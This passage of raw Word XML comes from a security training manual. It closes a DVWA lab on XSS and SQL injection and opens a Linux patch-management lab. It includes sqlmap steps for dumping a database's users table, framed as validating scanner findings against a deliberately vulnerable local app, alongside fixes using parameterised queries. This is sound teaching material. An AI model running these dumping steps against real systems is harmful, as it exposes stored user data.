          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Enumerate databases (you should see dvwa).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dump tables on request (--tables -D dvwa, then --dump -T users).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This is exactly the workflow a red-team or scanner-validation analyst follows after seeing a scanner alert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Mitigation: parameterised queries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The only correct fix for SQLi is parameterised queries / prepared statements. PHP/PDO example DVWA uses on its impossible level:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$stmt = $pdo-&gt;prepare('SELECT first_name, last_name FROM users WHERE user_id = ?');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$stmt-&gt;execute([$id]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Note: input validation (whitelisting integers, etc.) is a useful defence in depth, but never the primary fix — it gets bypassed by encoding tricks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Map the lab to CySA+ 2.4 secure-coding bullets</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secure coding bullet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2, 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Output encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Session management (HttpOnly, SameSite cookies stop XSS-driven session theft)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4–6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Parameterized queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Input validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>All</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Authentication (DVWA login)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Data protection (CSP, Secure cookies)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Tear down</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docker stop dvwa &amp;&amp; docker rm dvwa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trigger and recognise reflected XSS, stored XSS, and SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Use curl and sqlmap to validate scanner findings end-to-end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The correct primary mitigation for each class (encoding, validation, parameterisation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The link between the OWASP/DVWA exercises and CySA+ 2.4 secure-coding bullets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Browser-Based Tools (Tertiary Infotech)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These free browser tools complement this lab — no install required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PenTest FauxBank (https://pentest-fauxbank.vercel.app/) — a deliberately-vulnerable demo banking web app for safe web-attack practice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Practise reflected/stored XSS and SQL injection against PenTest FauxBank in the browser, then reproduce the same class of attack on DVWA in the lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cybersecurity Simulator (https://alfredang.github.io/cybersecuritysimulator/) — an interactive browser simulator for practising security-analyst decisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Use the Cybersecurity Simulator to connect each web weakness you exploit to the analyst response and mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to trigger and recognise reflected XSS, stored XSS, and SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 18 — Patch Management and Hardening</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configure automated patching, list every unpatched CVE on the host, validate a patch with a smoke-test rollback path, and re-score with lynis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will configure automated patching, list every unpatched CVE on the host, validate a patch with a smoke-test rollback path, and re-score with lynis. This maps to CySA+ 2.5 (Patching and configuration management — Testing / Implementation / Rollback / Validation, Maintenance windows, Attack surface reduction).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install patching tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y unattended-upgrades debsecan lynis needrestart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — List every unpatched CVE on the host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>debsecan --suite=$(lsb_release -cs) --format=summary | head -30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>debsecan --suite=$(lsb_release -cs) --only-fixed | wc -l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>debsecan reads Debian / Ubuntu security tracker data and prints unfixed CVEs by package. --only-fixed shows just the ones that have an available patch — your immediate priority list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Enable unattended security upgrades</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dpkg-reconfigure -plow unattended-upgrades 2&gt;/dev/null || true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat /etc/apt/apt.conf.d/50unattended-upgrades | head -20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat /etc/apt/apt.conf.d/20auto-upgrades 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If 20auto-upgrades does not exist, create it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; /etc/apt/apt.conf.d/20auto-upgrades &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>APT::Periodic::Update-Package-Lists "1";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>APT::Periodic::Unattended-Upgrade "1";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This installs security patches every day automatically — the table-stakes Implementation control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Test before patching (CySA+ "Testing")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Patches break things. The CySA+ blueprint expects a staging step. Snapshot the relevant config and a smoke test:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sha256sum /etc/ssh/sshd_config &gt; /tmp/preupdate.hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ssh -V 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -o /dev/null -w "%{http_code}\n" http://localhost:80 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Capture working state. Now apply patches with a dry-run first:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt -s upgrade | head -20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-s simulates. If the simulation lists packages you depend on, schedule a maintenance window first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Apply the patch (CySA+ "Implementation")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DEBIAN_FRONTEND=noninteractive apt -y upgrade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Inside a real maintenance window you would post-notify stakeholders, then move on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Validate the patch (CySA+ "Validation")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
